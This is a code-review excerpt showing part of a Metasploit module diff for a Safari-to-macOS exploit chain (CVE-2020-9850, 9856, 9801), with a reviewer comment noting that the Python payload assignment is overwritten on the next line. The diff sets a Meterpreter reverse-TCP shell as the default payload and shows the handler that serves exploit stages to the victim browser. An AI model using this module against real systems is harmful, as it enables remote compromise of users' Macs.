modules/exploits/osx/browser/safari_in_operator_side_effect.rb

```diff
@@ -0,0 +1,485 @@
+          the <embed> element with the PDF plugin provides a callback that can trigger
+          side-effects leading to type confusion (CVE-2020-9850).
+          The type confusion can be used as addrof and fakeobj primitives that then
+          lead to arbitrary read/write of memory. These primitives allow us to write
+          shellcode into a JIT region (RWX memory) containing the next stage of the
+          exploit.
+          The next stage uses CVE-2020-9856 to exploit a heap overflow in CVM Server,
+          and extracts a macOS application containing our payload into /var/db/CVMS.
+          The payload can then be opened with CVE-2020-9801, executing the payload
+          as a user but without sandbox restrictions.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Yonghwi Jin <jinmoteam[at]gmail.com>', # pwn2own2020
+            'Jungwon Lim <setuid0[at]protonmail.com>', # pwn2own2020
+            'Insu Yun <insu[at]gatech.edu>', # pwn2own2020
+            'Taesoo Kim <taesoo[at]gatech.edu>', # pwn2own2020
+            'timwr' # metasploit integration
+          ],
+        'References' => [
+          ['CVE', '2020-9801'],
+          ['CVE', '2020-9850'],
+          ['CVE', '2020-9856'],
+          ['URL', 'https://github.com/sslab-gatech/pwn2own2020'],
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
+        'Targets' => [
+          [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
+          [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
+          [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+        ],
+        'DisclosureDate' => 'Mar 18 2020'
+      )
+    )
+    register_advanced_options([
+      OptBool.new('DEBUG_EXPLOIT', [false, 'Show debug information in the exploit javascript', false]),
+    ])
+  end
+
+  def on_request_uri(cli, request)
+    if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}
+      print_status("[*] #{request.body}")
+      send_response(cli, '')
+      return
+    end
+
+    user_agent = request['User-Agent']
+    print_status("Request #{request.uri} from #{user_agent}")
+    if request.uri.ends_with? '.pdf'
+      send_response(cli, '', { 'Content-Type' => 'application/pdf' })
+      return
+    end
+
+    utils = exploit_data 'CVE-2018-4233', 'utils.js'
+    int64 = exploit_data 'CVE-2018-4233', 'int64.js'
+    stage0 = exploit_data 'CVE-2020-9850', 'stage0.bin'
+    stage1 = exploit_data 'CVE-2020-9850', 'loader.bin'
+    stage2 = exploit_data 'CVE-2020-9850', 'sbx.bin'
+    if target['Arch'] == ARCH_X64
+      root_payload = payload.encoded
+    else
+      root_cmd = payload.raw
+      if target['Arch'] == ARCH_PYTHON
+        root_payload = "echo \"#{root_cmd}\" | python"
+      end
+      root_payload = "CMD:#{root_cmd}"
```

Comment:
What's going on here?

If target arch is Python, you set `root_payload`, then on the next line you change your mind and set `root_payload` again.